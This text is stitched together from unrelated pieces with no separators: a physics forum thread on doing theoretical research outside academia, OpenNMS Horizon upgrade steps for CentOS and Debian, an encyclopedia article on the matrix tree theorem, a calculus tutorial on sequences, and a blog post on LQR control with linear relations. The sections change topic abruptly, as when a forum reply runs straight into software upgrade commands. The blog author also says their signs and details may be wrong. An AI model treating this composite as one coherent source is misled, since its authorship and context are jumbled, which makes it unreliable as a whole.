
ZapperZ (Staff Emeritus, Science Advisor, Education Advisor, 2018 Award)
Thank you Dr. Jones and Orodruin for your replies. You're certainly right that the example I gave is not statistically significant. But if a theoretical physicist hypothetically found a way to financially support themselves, then what is the added benefit of going into academia if you can conduct the research on your own?
If you found a way to get passive income that doesn't demand as much time as the administrative and teaching duties of a professor, then wouldn't it be better to avoid academia if you can still do research on your own?

But as a "researcher", you could easily have done some research on this. For example, if this is statistically significant, then MORE Garrett Lisis would have been around, and more of them would be prominent.

You also have this idea that one does "theoretical physics" in a vacuum. The support of an institution is often necessary to (i) get access to the latest publications, etc... (ii) go to conferences where many ideas get hatched, developed, regurgitated, washed-and-spun-dry, etc.... (iii) establish new contacts/network/etc. If you look closely, there are very few theoretical papers with only ONE author, or without much support and interactions. The fact that places such as the Institute for Advanced Study and the Perimeter Institute exist and became successful and useful is "experimental data" that even theoretical physics needs institutional support and external interactions.

And I haven't even gotten to areas of theoretical physics that require huge computational support to produce simulations and results. What individual do you think has such a facility in his/her garage?

Zz.

It is possible, but also extremely challenging, and publishing takes more time, since you literally have to find the time. I myself have taken this path and I actually finance my own theoretical research from my profession as a medical practitioner. Software licenses and literature access are granted to me freely through ties with a university department: by remaining friends with a few of the staff, occasionally publishing together with them, and helping them and their students with research, e.g. guiding students and advising w.r.t. methodology and technical aspects of research.

Also, you should worry somewhat, but again not too much, about performance indicators such as having high citation indices; these indices do not necessarily measure what they are aiming to measure, namely how you and your work actually compare to your peers and their work. It is important to realize that such measures were invented for intended usage by administrators in order to systematically select, hire and pay researchers while giving the illusion of doing this in a scientific manner, i.e. it is almost irrelevant for someone outside academia. Moreover, in contrast to popular belief, there are in fact many cases where different kinds of works and workers are actually incomparable, e.g. technical work focused on short-term progress within a mature research programme as opposed to conceptual work focused on long-term progress within a novel research programme, as well as the likes of Newton, Gauss or Grothendieck in comparison with their contemporaries: mathematical skill is not normally distributed!

Conceptual work is usually characteristic of the kind of original research that outsiders do, including Garrett Lisi and Julian Barbour, i.e. when one is not merely doing technical research but also doing foundational, conceptual and/or non-technical theoretical research.
This kind of work usually cannot easily be done by simply replacing oneself with someone else, if that other person lacks the necessary idiosyncratic background, insight, creativity, vision and persistence required for this type of work; in such cases, citation indices are completely misleading metrics, practically of no use whatsoever a priori, perhaps only useful a posteriori.

From my own experience and academic circle, most recent graduates I have met in academia simply lack the creativity, drive and boldness to actually do real foundational work, while the majority of graduate students are simply incapable of entirely creating and running their own original research programme at a sophisticated level; instead, they opt for lower-hanging fruit and a safer career path. Only a few of them become capable of doing this somewhat later in life, and even then they tend - due to their training - to be more proficient at being a specialist, while what is required for such work is the mind of a generalist.

Historically, there are loads of big names for whom the above characterization was true, and it is usually more true for theoreticians and mathematicians who do more creative mathematical work constructing new foundations both in physics and in mathematics; think of the likes of Newton, Euler, Gauss, Riemann, Lagrange, Hamilton, Ramanujan, Einstein, Poincaré, Feynman and so on, who tended to be guided more by deeply personal reasons than by what academia and the contemporary literature wanted. Notice how the founders of QT are not on this list; this has a lot to do with the current foundations of QT still being an embarrassment, and I maintain that completing the research programme of constructive QFT is the only way out for QT, but I digress.

As I have mentioned, foundational work actually requires creativity, but creativity, while necessary, is not sufficient. One also has to be trained in doing academic research, i.e. know how to effectively read the literature, find reviews, critically appraise topics, master certain techniques, become familiar with certain theories and so on; this skillset is most effectively learned by staying within academia, but again that is not necessary, especially if one has a mentor, close friend or family member who is in academia and can guide them through such hoops. In any case, with sufficient discipline this can be self-taught as well, but it is a lot of work and there aren't (m)any guides available, i.e. you have to pick yourself up by your own bootstraps and (re)invent this for yourself; this is why these skills are best picked up by shadowing, emulation and osmosis of the day-to-day activities of active researchers.

PAllen (Science Advisor)
Most of my publications were authored at times when I did not hold a college faculty position, including everything I've published in the past 5 years. It is mostly meat and potatoes work in blast physics and ballistics. So yes, I am making contributions to physics, but nothing earth shattering.
Seems like it could be earth shattering ...

Dr. Courtney (Education Advisor, Gold Member, 2018 Award)
Seems like it could be earth shattering ...
Most of my theory work in blast and ballistics has focused on injury mechanisms and exposure thresholds for causing injury. My experimental work in blast and ballistics has focused on inventing laboratory scale devices for creating experimental blast waves without the expense and handling difficulties of using real high explosives.
Over the past year or two, my personal motivation has shifted from "contributing to physics" to "training the next generation of scientists." So most of my "best ideas" get shelved until a student or colleague comes along looking for a project. I see my "best ideas" as the most fertile training ground for younger scientists. My resume does not need much more enhancement.

For example, with the increases in computer speed and memory over the past 25 years, it would be a simple matter to dust off my old atomic physics codes and crank out a few papers for Physical Review A (or similar). These would be relatively modest contributions to a field known as quantum chaos. But this would all be much more meaningful for some younger scientist than for me. I have a steady stream of students knocking at my door wanting help with research (and I welcome them). The trick is matching their interests and abilities to the available project ideas. That gets harder if I carry out my best project ideas as a solo act.
This procedure describes how to do a basic Horizon upgrade. You may need to complete additional steps to upgrade in a more complex setup (for example, if you run more than one Horizon instance, have more complex database migration requirements, or depending on the age of the current version). If you use Git to track changes to your configuration files, see Upgrade Horizon with Git.

Make sure you complete the tasks in the "Before you begin" section before starting. In addition, if the system requirements for the new version require you to upgrade your PostgreSQL database, you must do this before the Horizon upgrade.

## Update and verify the Horizon repository

### CentOS/RHEL

Your Horizon repository is defined in the `/etc/yum.repos.d/` directory. The file may be named `opennms-repo-stable-<OSversion>.repo`, but it is not guaranteed to be.

2. Install `yum-utils` and enable the Horizon repository:
``yum -y install yum-utils``
``yum-config-manager --enable opennms-repo-stable-*``

3. Purge any cached yum data:
``yum clean all``

4. Make a backup copy of your config:
``rsync -Ppav ${OPENNMS_HOME}/etc /tmp/etc.orig``
``rsync -Ppav ${OPENNMS_HOME}/jetty-webapps/opennms/WEB-INF /tmp/opennms-web-inf``

5. Upgrade the OpenNMS packages:
``yum -y upgrade opennms``

6. Disable the Horizon repository again:
``yum-config-manager --disable opennms-repo-stable-*``

7. Upgrade Java 11 to the latest release:
``yum -y install java-11-openjdk java-11-openjdk-devel``

8. Use the `runjava` command to set the JVM that Horizon will use:
``${OPENNMS_HOME}/bin/runjava -s``

9. Check for configuration file changes and update accordingly, using the files you backed up in "Identify changed configuration files". If you upgrade in place, Horizon renames any shipped config that conflicts with an existing user-modified config to `.rpmnew` or `.rpmsave`. Inspect these files manually and reconcile any differences. Use `diff -Bbw` and `diff -y` to look for changes. If any `.rpmnew` or `.rpmsave` files exist within the configuration directory, services will not start.

10. Run the Horizon installer:
``${OPENNMS_HOME}/bin/install -dis``
The upgrade may take some time. An "Upgrade completed successfully!" message confirms that the upgrade has completed. If you do not get this message, check the output of the install command for any errors.

11. Clear the Karaf cache:
``yes | ${OPENNMS_HOME}/bin/fix-karaf-setup.sh``

12. Start Horizon:
``systemctl start opennms.service``
`tail -F ${OPENNMS_HOME}/logs/manager.log` shows the Horizon startup progress.

13. The upgrade is completed and operation resumes. Make sure that you clear your browser's cache before using the Horizon web UI against the upgraded version. This is especially important for pages that use JavaScript heavily (for example, the Requisitions UI).

### Debian/Ubuntu

Your Horizon repository is defined in `/etc/apt/sources.list`. The file may be named `opennms-repo-stable-<OSversion>.repo`, but it is not guaranteed to be.

2. Remove the hold on the OpenNMS packages:
``sudo apt-mark unhold libopennms-java libopennmsdeps-java opennms-common opennms-db``

3. Purge any cached data:
``apt-get clean``

4. Make a backup copy of your config:
``rsync -Ppav ${OPENNMS_HOME}/etc /tmp/etc.orig``
``rsync -Ppav ${OPENNMS_HOME}/jetty-webapps/opennms/WEB-INF /tmp/opennms-web-inf``

5. Upgrade the OpenNMS packages:
``apt-get upgrade opennms``

6. Put the OpenNMS packages back on hold:
``sudo apt-mark hold libopennms-java libopennmsdeps-java opennms-common opennms-db``

7. Upgrade Java 11 to the latest release:
``apt-get install openjdk-11-jdk-headless openjdk-11-jre-headless``

8. Use the `runjava` command to set the JVM that Horizon will use:
``${OPENNMS_HOME}/bin/runjava -s``
9. Check for configuration file changes and update accordingly, using the files you backed up in "Identify changed configuration files". Debian prompts you to keep or overwrite your files during the `apt upgrade` process. Inspect these files manually and reconcile any differences. Use `diff -Bbw` and `diff -y` to look for changes.

10. Run the Horizon installer:
``${OPENNMS_HOME}/bin/install -dis``
The upgrade may take some time. An "Upgrade completed successfully!" message confirms that the upgrade has finished. If you do not get this message, check the output of the install command for any errors.

11. Clear the Karaf cache:
``yes | ${OPENNMS_HOME}/bin/fix-karaf-setup.sh``

12. Start Horizon:
``systemctl start opennms.service``
`tail -F ${OPENNMS_HOME}/logs/manager.log` shows the Horizon startup progress.

13. The upgrade is completed and operation resumes. Make sure that you clear your browser's cache before using the Horizon web UI against the upgraded version. This is especially important for pages that use JavaScript heavily (for example, the Requisitions UI).
# Matrix tree theorem Let $G = ( V , E )$ be a graph with $\nu$ vertices $\{ v _ { 1 } , \dots , v _ { \nu } \}$ and edges $\{ e _ { 1 } , \dots , e _ { \epsilon } \}$, some of which may be oriented. The incidence matrix of $G$ is the $( \nu \times \epsilon )$-matrix $M = [ m _ { i j } ]$ whose entries are given by $m _ { i j } = 1$ if $e_{j}$ is a non-oriented link (i.e. an edge that is not a loop) incident to $v_i$ or if $e_{j}$ is an oriented link with head $v_i$, $m _ { i j } = - 1$ if $e_{j}$ is an oriented link with tail $v_i$, $m _ { i j } = 2$ if $e_{j}$ is a loop (necessarily non-oriented) at $v_i$, and $m _ { i j } = 0$ otherwise. The mixed Laplacian matrix of $G$ is defined as $L = [ l _ {i j } ] = M M ^ { T }$. It is easy to see that the diagonal entries of $L$ give the degrees of the vertices with, however, each loop contributing $4$ to the count, and the off-diagonal entry $l_{i j}$ gives the number of non-oriented edges joining $v_i$ and $v _ { j }$ minus the number of oriented edges joining them. Let $\tau ( G )$ denote the number of spanning trees of $G$, with orientation ignored. The matrix tree theorem in its classical form, which is already implicit in the work of G. Kirchhoff [a9], states that if $L$ is the Laplacian of any orientation of a loopless undirected graph $G$ and $L ^ { * }$ is the matrix obtained by deleting any row $s$ and column $t$ of $L$, then $\tau ( G ) = ( - 1 ) ^ { s + t } \operatorname { det } ( L ^ { * } )$; that is, each cofactor of $L$ is equal to the tree-number of $G$. If $\operatorname{adj}( L )$ denotes the adjoint of the matrix $L$ and $J$ denotes the matrix with all entries equal to $1$, then $\operatorname { adj } ( L ) = \tau ( G ) J$. The proof of this theorem uses the Binet–Cauchy theorem to expand the cofactor of $L$ together with the fact that every non-singular $( \nu - 1 ) \times ( \nu - 1 )$-minor of $M$ (cf. also Minor) comes from a spanning tree of $G$ having value $\pm 1$. In the case of the complete graph $K _ { \nu }$ (with some orientation), $L = \nu I - J$, and it can be seen that $\tau ( K _ { \nu } ) = \nu ^ { \nu - 2 }$, which is Cayley's formula for the number of labelled trees on $\nu$ vertices [a4]. Temperley's result [a3], Prop. 6.4, avoids using the cofactor notation in the following form: $\nu ^ { 2 } \tau ( G ) = \operatorname { det } ( J + L )$. It is interesting to note that this determinantal way of computing $\tau ( G )$ requires $\nu ^ { 3 }$ operations rather than the $2 ^ { \nu }$ operations when using recursion [a17], p. 66. For a loopless directed graph $G$, let $L ^ { - } = D ^ { - } - A ^ { \prime }$ and $L ^ { + } = D ^ { + } - A ^ { \prime }$, where $D ^ { - }$ and $D ^ { + }$ are the diagonal matrices of in-degrees and out-degrees in $G$, and the $i j$-entry of $A ^ { \prime }$ is the number of edges from $v _ { j }$ to $v_i$. An out-tree is an orientation of a tree having a root of in-degree $0$ and all other vertices of in-degree $1$. An in-tree is an out-tree with its edges reversed. W.T. Tutte [a16] extended the matrix tree theorem by showing that the number of out-trees (respectively, in-trees) rooted at $v_i$ is the value of any cofactor in the $i$th row of $L^-$ (respectively, $i$th column of $L ^ { + }$). In fact, the principal minor of $L$ obtained by deleting rows and columns indexed by $v _ { i_1 } , \dots , v _ { i_k }$ equals the number of spanning forests of $G$ having precisely $k$ out-trees rooted at $v _ { i_1 } , \dots , v _ { i_k }$. 
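To make the classical statement concrete, here is a minimal NumPy sketch (added for illustration; it is not part of the original article) that checks both the cofactor form of the matrix tree theorem and Temperley's formula $\nu^2 \tau(G) = \operatorname{det}(J + L)$ for the complete graph $K_4$, using $L = \nu I - J$ as noted above; Cayley's formula gives $\tau(K_4) = 4^{4-2} = 16$:

```python
import numpy as np

# Laplacian of the complete graph K_4: L = nu*I - J
nu = 4
J = np.ones((nu, nu))
L = nu * np.eye(nu) - J

# Classical matrix tree theorem: any cofactor of L equals tau(G).
# Delete row 0 and column 0 and take the determinant (sign (-1)^(0+0) = +1).
cofactor = np.linalg.det(L[1:, 1:])
print(round(cofactor))                        # 16 = 4**(4-2), Cayley's formula

# Temperley's form: nu^2 * tau(G) = det(J + L)
print(round(np.linalg.det(J + L) / nu**2))    # 16 again
```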
In all the approaches it is clear that the significant property of the Laplacian $L$ is that $\sum _ { j } l _ { ij } = 0$ for $1 \leq i \leq \nu$. By allowing $l_{i j}$ to be indeterminates over the field of rational numbers, the generating function version of the matrix tree theorem is obtained [a8], Sect. 3.3.25: The number of trees rooted at $r$ on the vertex set $\{ 1 , \dots , \nu \}$, with $m_{ij}$ occurrences of the edge $\overset{\rightharpoonup} { i j }$ (directed away from the root), is the coefficient of the monomial $\prod _ { i , j } l _ { i j } ^ { m _ { i j } }$ in the $( r , r )$th cofactor of the matrix $[ \delta _ { i j } \alpha _ { i } - l_{i j} ] _ { \nu \times \nu }$, where $m _ { i j } \in \{ 0,1 \}$ and $\alpha_i$ is the sum of the entries in the $i$th row of $L$, for $i = 1 , \dots , \nu$. Several related identities can be found in work by J.W. Moon on labelled trees [a13]. For various proofs of Cayley's formula, see [a14]. Another direction of generalization is to interpret all the minors of the Laplacian rather than just the principal ones. Such generalizations can be found in [a5] and [a2], where arbitrary minors are expressed as signed sums over non-singular substructures that are more complicated than trees. The edge version of the Laplacian is defined to be the $( \epsilon \times \epsilon )$-matrix $K = M ^ { T } M$. The connection of its cofactors with the Wiener index in applications to chemistry is presented in [a11]. The combinatorial description of the arbitrary minors of $K$ when $G$ is a tree is studied in [a1]. Applications are widespread. Variants of the matrix tree theorem are used in the topological analysis of passive electrical networks. The node-admittance matrix considered for this purpose is closely related to the Laplacian matrix (see [a10], Chap. 7). Abundance of forests suggests greater accessibility in networks. Due to this connection, the matrix tree theorem is used in developing distance concepts in social networks (see [a6]). The $C$-matrix which occurs in the design of statistical experiments (cf. also Design of experiments) is the Laplacian of a graph associated with the design. In this context the matrix tree theorem is used to study $D$-optimal designs (see [a7], p. 67). Finally, the matrix tree theorem is closely related to the Perron–Frobenius theorem. If $A$ is the transition matrix of an irreducible Markov chain, then by the Perron–Frobenius theorem it admits a unique stationary distribution. This fact is easily deduced from the matrix tree theorem, which in fact gives an interpretation of the components of the stationary distribution in terms of tree-counts. This observation is used to approximate the stationary distribution of a countable Markov chain (see [a15], p. 222). An excellent survey of interesting developments related to Laplacians may be found in [a12]. #### References [a1] R.B. Bapat, J.W. Grossman, D.M. Kulkarni, "Edge version of the matrix tree theorem for trees" Linear and Multilinear Algebra , 47 (2000) pp. 217–229 [a2] R.B. Bapat, J.W. Grossman, D.M. Kulkarni, "Generalized matrix tree theorem for mixed graphs" Linear and Multilinear Algebra , 46 (1999) pp. 299–312 [a3] N. Biggs, "Algebraic graph theory" , Cambridge Univ. Press (1993) (Edition: Second) [a4] A. Cayley, "A theorem on trees" Quart. J. Math. , 23 (1889) pp. 376–378 [a5] S. Chaiken, "A combinatorial proof of the all minors matrix tree theorem" SIAM J. Algebraic Discr. Math. , 3 : 3 (1982) pp. 319–329 [a6] P.Yu. Chebotarev, E.V. 
Shamis, "The matrix-forest theorem and measuring relations in small social groups" Automat. Remote Control , 58 : 9:2 (1997) pp. 1505–1514 [a7] G.M. Constantine, "Combinatorial theory and statistical design" , Wiley (1987) [a8] I.P. Goulden, D.M. Jackson, "Combinatorial enumeration" , Wiley (1983) [a9] G. Kirchhoff, "Über die Auflösung der Gleichungen, auf welche man bei der Untersuchung der linearen Verteilung galvanischer Ströme geführt wird" Ann. Phys. Chem. , 72 (1847) pp. 497–508 [a10] W. Mayeda, "Graph theory" , Wiley (1972) [a11] R. Merris, "An edge version of the matrix-tree theorem and the Wiener index" Linear and Multilinear Algebra , 25 (1989) pp. 291–296 [a12] R. Merris, "Laplacian matrices of graphs: a survey" Linear Alg. & Its Appl. , 197/198 (1994) pp. 143–176 [a13] J.W. Moon, "Counting labeled trees" , Canad. Math. Monographs , 1 , Canad. Math. Congress (1970) [a14] J.W. Moon, "Various proofs of Cayley's formula for counting trees" F. Harary (ed.) , A Seminar on Graph Theory , Holt, Rinehart & Winston (1967) pp. 70–78 [a15] E. Seneta, "Non-negative matrices and Markov chains" , Springer (1981) (Edition: Second) [a16] W.T. Tutte, "The disection of equilateral triangles into equilateral triangles" Proc. Cambridge Philos. Soc. , 44 (1948) pp. 463–482 [a17] D.B. West, "Introduction to graph theory" , Prentice-Hall (1996) How to Cite This Entry: Matrix tree theorem. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Matrix_tree_theorem&oldid=50697 This article was adapted from an original article by Ravindra B. BapatJerrold W. GrossmanDevadatta M. Kulkarni (originator), which appeared in Encyclopedia of Mathematics - ISBN 1402006098. See original article
# Sequences

Infinite sequences are an important introduction to infinite series, since infinite series are built upon infinite sequences. Notice the difference.

| Sequence | Series |
| --- | --- |
| A sequence is just a list of items separated by commas. | With a series, we actually add up some (or all) terms of some sequence. |

Sequences can be infinite (have an infinite number of terms) or finite (have a finite number of terms).

| Example 1: $$\{ 1, 2, 3, 4, 5 \}$$ | Example 2: $$\{ 1, 4, 9, 16, 25, 36, . . . \}$$ |
| --- | --- |
| This is a finite sequence since it has a finite number of elements, i.e. after the number $$5$$ there are no more numbers in the sequence and it stops. | This is an infinite sequence since it has an infinite number of elements. The infinite part is denoted by the three periods at the end of the list. |

We don't always list the elements of a sequence. If there is a logical pattern, we can write it in a more compact form as an equation. This idea is discussed in the next section on notation.

## Notation

Sequences may be written in several different ways. These are the ones you will come across the most in calculus.
1. As a list of items; we showed this in the two examples above.
2. $$\displaystyle{\{a_n\}_{n=1}^{n=\infty}}$$ or more simply as $$\displaystyle{\{a_n\}_{1}^{\infty}}$$; in example 2 above, we would also include what $$a_n$$ was, i.e. $$a_n = n^2$$.
3. Similar to the last way, we could write the sequence in example 2 above as $$\displaystyle{\{n^2\}_{n=1}^{n=\infty}}$$; in this case, $$a_n$$ is implied to be $$a_n = n^2$$.
4. You also often see a sequence written without specifying $$n$$, i.e. $$\{a_n\}$$, and n is implied as $$n = 1, 2, 3, . . . \infty$$
5. A sequence can also be built from itself, called a recursive sequence. In these types of sequences, the first few terms are given and the following terms are defined based on those first terms. For example, $$a_1 = 1, ~~ a_{n+1} = 2a_n$$.
6. Finally, you can describe a sequence with words. This is shown in practice problem C01 below. This is a very unusual way to do it, so you won't see it much.

The whole idea is to emphasize that a sequence is a LIST of elements. Each element stands alone and does not interact at all with any other element. Here is a quick introduction video clip that will get you started. It has a couple of good examples.

PatrickJMT - Sequences

## Arithmetic Sequence

One special type of sequence is an arithmetic sequence, which looks like $$\{ a_n \}$$ where $$a_n = c+nk$$, and $$c$$ and $$k$$ are constants. An example is $$\{ 3, 12, 21, 30, . . . \}$$. Notice that in this example, we start with $$3$$ and add $$9$$ to get the next element.

## Geometric Sequence

Another special type of sequence is a geometric sequence. This sequence looks like $$\{ a_n \} = \{ c, cr, cr^2, cr^3, . . . \}$$ where the terms are of the form $$a_n = cr^n$$ for $$n=0, 1, 2 . . .$$, $$c$$ is a constant and $$r$$ is a term that does not contain $$n$$. An example is $$\{ 1, 3, 9, 27, 81, . . . \}$$ where we start with $$1$$ and multiply by $$3$$ to get the next element. Compare this to the arithmetic sequence where we add to get the next element.

## Sequence Convergence and Divergence

Convergence of a sequence is defined as the limit of the terms approaching a specific real number. In equation terms, it looks like this. For a sequence $$\{a_n\}$$ where $$n=\{1, 2, 3, 4, . . .
\}$$, we calculate $$\displaystyle{ \lim_{n \to \infty}{a_n} = L }$$ Convergence: If $$L$$ is a real number, then we say that the sequence $$\{a_n\}$$ converges to $$L$$. Divergence: If $$L = \pm \infty$$ or the limit cannot be determined, i.e. it is undefined, then the sequence is said to diverge. Note: The index $$n$$ can start at zero instead of one. This is what happened with the geometric sequence shown in the previous section. In actuality, the index can start at any number. However, for consistency, we usually start it at either zero or one. Using L'Hôpital's Rule When evaluating the limit $$\displaystyle{ \lim_{n \to \infty}{a_n} = L }$$, we sometimes need to use L'Hôpital's Rule. In the course of using L'Hôpital's Rule, we will need to take some derivatives. However, derivatives are only defined on continuous functions. And since a sequence is a set of discontinuous values, we can't directly use L'Hôpital's Rule. Fortunately, we have a theorem that will help us. Theorem If we can find a continuous function, call it $$g(x)$$ where $$g(n) = a_n$$ for all $$n$$, then $$\displaystyle{ \lim_{x \to \infty}{g(x)} = \lim_{n \to \infty}{a_n} }$$. Finding a function $$g(x)$$ is not usually that hard, if $$a_n$$ is given in equation terms. Just replace $$n$$ with $$x$$. I know this seems kind of picky but you need to get used to following the exact requirements of theorem. That is one reason we suggest that you read through and try to understand proofs in calculus. Okay, let's get down to some details and how to work with sequences. These next two videos will help you a lot. This video is a bit long but well worth taking the time to watch. It contains a lot of detail about sequences and how to work with them and has plenty of good examples. Dr Chris Tisdell - Sequences (part 1) This video is a continuation of the previous video and is not as long but it discusses the core of sequences, boundedness and convergence behaviour. You need to watch the previous video first to get the context before watching this one. Dr Chris Tisdell - Sequences (part 2) Binomial Theorem The binomial theorem is a way to expand a term in the form $$(a+b)^n$$ into a series. We do not cover this topic extensively at this time but here is a video to get you started with an explanation of the equation and an example. PatrickJMT - The Binomial Theorem Okay, time for some practice problems. After that, you will be ready to begin working with infinite series. infinite series → Search 17Calculus Practice Problems Instructions - - Unless otherwise instructed, write the first few terms of these sequences and determine if they converge or diverge. If not specified, start the index at n=1. Level A - Basic Practice A01 $$\displaystyle{ \left\{ \frac{2n}{6n-5} \right\} }$$ solution Practice A02 $$\displaystyle{\left\{\frac{n+1}{n^2}\right\}_{n=1}^{n=\infty}}$$ solution Practice A03 $$\displaystyle{\left\{\frac{3n^2-1}{10n+4n^2}\right\}_{n=2}^{n=\infty}}$$ solution Practice A04 Find the limit of the sequence $$\{a_n\}$$ where $$\displaystyle{a_n=\frac{2n}{5n-3}}$$. solution Practice A05 Find the limit of the sequence $$\{a_n\}$$ where $$\displaystyle{a_n=\frac{n^2-n+7}{2n^3+n^2}}$$. solution Practice A06 Find the nth term of the sequence $$\{ 1, 4, 9, 16 . . . \}$$ solution Practice A07 Find a formula for the general term $$a_n$$ of the sequence $$\displaystyle{ \left\{ \frac{1}{2}, -\frac{4}{3}, \frac{9}{4}, -\frac{16}{5}, \frac{25}{6}, . . . 
\right\} }$$ solution Practice A08 $$\{n(n-1)\}$$ solution Practice A09 $$\displaystyle{\left\{1+\left(-\frac{1}{2}\right)^n\right\}}$$ solution Practice A10 Compute $$\displaystyle{\lim_{n\to\infty}{\frac{\ln(n)}{n}} }$$ solution Practice A11 Compute $$\displaystyle{\lim_{n\to\infty}{\sqrt[n]{n}} }$$ using the result from the previous problem. solution Level B - Intermediate Practice B01 $$\displaystyle{\left\{\frac{(-1)^{n+1}}{3^n}\right\}_{n=0}^{n=\infty}}$$ solution Practice B02 For the sequence $$\displaystyle{\left\{\frac{1}{2n+3}\right\}}$$ determine whether it is increasing, decreasing, monotonic and if it is bounded. Explain your reasoning. solution Practice B03 $$\displaystyle{\left\{\frac{e^{3n}}{n^2}\right\}}$$ solution Practice B04 $$\displaystyle{\left\{\frac{2^n}{3^{n+1}}\right\}}$$ solution Write down the first few terms of the sequence $$\displaystyle{\{a_n\}}$$ where $$a_n$$ is the nth digit of $$e$$ and discuss the convergence or divergence of the sequence.
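If you want to sanity-check an answer numerically, here is a minimal Python sketch (not part of the practice set) that tabulates terms of the sequence from practice problem A01, $$\displaystyle{ \left\{ \frac{2n}{6n-5} \right\} }$$, and shows them settling toward the limit $$1/3$$:

```python
# Numerically examine a_n = 2n/(6n - 5) from practice problem A01.
def a(n):
    return 2 * n / (6 * n - 5)

for n in [1, 10, 100, 1000, 10_000, 100_000]:
    print(f"a_{n} = {a(n):.6f}")

# The terms settle toward 2/6 = 1/3, so the sequence converges to 1/3.
print(f"limit = {1/3:.6f}")
```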
## Categorical LQR Control with Linear Relations Last time, I described and built an interesting expansion of describing systems via linear functions, that of using linear relations. We remove the requirement that mappings be functional (exactly one output vector for any given input vector), which extends our descriptive capability. This is useful for describing “open” pieces of a linear system like electric circuits. This blog post is about another application: linear dynamical systems and control. Linear relations are an excellent tool for reachability/controllability. In a control system, it is important to know where it is possible to get the system to. With linear dynamics $x_{t+1} = Ax_{t} + B u_{t}$, an easy controllability question is “can my system reach into some subspace”. This isn’t quite the most natural question physically, but it is natural mathematically. My first impulse would be to ask “given the state starts in this little region over here, can it get to this little region over here”, but the subspace question is a bit easier to answer. It’s a little funky but it isn’t useless. It can detect if the control parameter only touches 1 of 2 independent dynamical systems for example. We can write the equations of motion as a linear relation and iterate composition on them. See Erbele for more. There is a set of different things (and kind of more interesting things) that are under the purview of linear control theory, LQR Controllers and Kalman filters. The LQR controller and Kalman filter are roughly (exactly?) the same thing mathematically. At an abstract mathematical level, they both rely on the fact that optimization of a quadratic objective $x^T Q x + r^T x + c$ with a linear constraints $Ax=b$ is solvable in closed form via linear algebra. The cost of the LQR controller could be the squared distance to some goal position for example. When you optimize a function, you set the derivative to 0. This is a linear equation for quadratic objectives. It is a useful framework because it has such powerful computational teeth. The Kalman filter does a similar thing, except for the problem of state estimation. There are measurements linear related to the state that you want to match with the prior knowledge of the linear dynamics of the system and expected errors of measurement and environment perturbations to the dynamics. There are a couple different related species of these filters. We could consider discrete time or continuous time. We can also consider infinite horizon or finite horizon. I feel that discrete time and finite horizon are the most simple and fundamental so that is what we’ll stick with. The infinite horizon and continuous time are limiting cases. We also can consider the dynamics to be fixed for all time steps, or varying with time. Varying with time is useful for the approximation of nonlinear systems, where there are different good nonlinear approximation (taylor series of the dynamics) depending on the current state. There are a couple ways to solve a constrained quadratic optimization problem. In some sense, the most conceptually straightforward is just to solve for a span of the basis (the “V-Rep” of my previous post) and plug that in to the quadratic objective and optimize over your now unconstrained problem. However, it is commonplace and elegant in many respects to use the Lagrange multiplier method. You introduce a new parameter for every linear equality and add a term to the objective $\lambda^T (A x - b)$. 
Hypothetically this term is 0 for the constrained solution so we haven’t changed the objective in a sense. It’s a funny slight of hand. If you optimize over x and $\lambda$, the equality constraint comes out as your gradient conditions on $\lambda$. Via this method, we convert a linearly constrained quadratic optimization problem into an unconstrained quadratic optimization problem with more variables. Despite feeling very abstract, the value these Lagrangian variables take on has an interpretation. They are the “cost” or “price” of the equality they correspond to. If you moved the constraint by an amount $Ax - b + \epsilon$, you would change the optimal cost by an amount $\lambda \epsilon$. (Pretty sure I have that right. Units check out. See Boyd https://www.youtube.com/watch?v=FJVmflArCXc) The Lagrange multipliers enforcing the linear dynamics are called the co-state variables. They represent the “price” that the dynamics cost, and are derivatives of the optimal value function V(s) (The best value that can be achieved from state s) that may be familiar to you from dynamic programming or reinforcement learning. See references below for more. Let’s get down to some brass tacks. I’ve suppressed some terms for simplicity. You can also add offsets to the dynamics and costs. A quadratic cost function with lagrange multipliers. Q is a cost matrix associated with the x state variables, R is a cost matrix for the u control variables. $C = \lambda_0 (x_0 - \tilde{x}_0) + \sum_t x_t^T Q x_t + u_t^T R u_t + \lambda_{t+1}^T (x_{t+1} - A x_t - B u_t )$ Equations of motion results from optimizing with respect to $\lambda$ by design. $\nabla_{\lambda_{t+1}} C = x_{t+1} - A x_t - B u_t = 0$. The initial conditions are enforced by the zeroth multiplier. $\nabla_{\lambda_0} C = x_i - x_{0} = 0$ Differentiation with respect to the state x has the interpretation of backwards iteration of value derivative, somewhat related to what one finds in the Bellman equation. $\nabla_{x_t} C = Q x_{t} + A^T \lambda_{t+1} - \lambda_{t} = 0 \Longrightarrow \lambda_{t} = A^T \lambda_{t+1} + Q x_{t}$ The final condition on value derivative is the one that makes it the most clear that the Lagrange multiplier has the interpretation of the derivative of the value function, as it sets it to that. $\nabla_{x_N} C = Q x_N - \lambda_{N} = 0$ Finally, differentiation with respect to the control picks the best action given knowledge of the value function at that time step. $\nabla_{u_t} C = R u_{t} - B^T \lambda_t = 0$ Ok. Let’s code it up using linear relations. Each of these conditions is a separate little conceptual box. We can build the optimal control step relation by combining these updates together The following is a bit sketchy. I am confident it makes sense, but I’m not confident that I have all of the signs and other details correct. I also still need to add the linear terms to the objective and offset terms to the dynamics. These details are all kind of actually important. Still, I think it’s nice to set down in preliminary blog form. ### Bits and Bobbles • The code in context https://github.com/philzook58/ConvexCat/blob/master/src/LinRel.hs • Some of the juicier stuff is nonlinear control. Gotta walk before we can run though. I have some suspicions that a streaming library may be useful here, or a lens-related approach. Also ADMM. • Reminiscent of Keldysh contour. Probably a meaningless coincidence. 
• In some sense H-Rep is the analog of (a -> b -> Bool) and V-rep [(a,b)] • Note that the equations of motion are relational rather than functional for a control systems. The control parameters $u$ describe undetermined variables under our control. • Loopback (trace) the value derivative for infinite horizon control. • Can solve the Laplace equation with a Poincare Steklov operator. That should be my next post. • There is something a touch unsatisfying even with the reduced goals of this post. Why did I have to write down the quadratic optimization problem and then hand translate it to linear relations? It’s kind of unacceptable. The quadratic optimization problem is really the most natural statement, but I haven’t figured out to make it compositional. The last chapter of Rockafellar? ### References https://arxiv.org/abs/1405.6881 Baez and Erbele – Categories in Control http://www.scholarpedia.org/article/Optimal_control http://www.argmin.net/2016/05/18/mates-of-costate/ – interesting analogy to backpropagation. Lens connection? https://courses.cs.washington.edu/courses/cse528/09sp/optimality_chapter.pdf ## Linear Relation Algebra of Circuits with HMatrix Oooh this is a fun one. I’ve talked before about relation algebra and I think it is pretty neat. 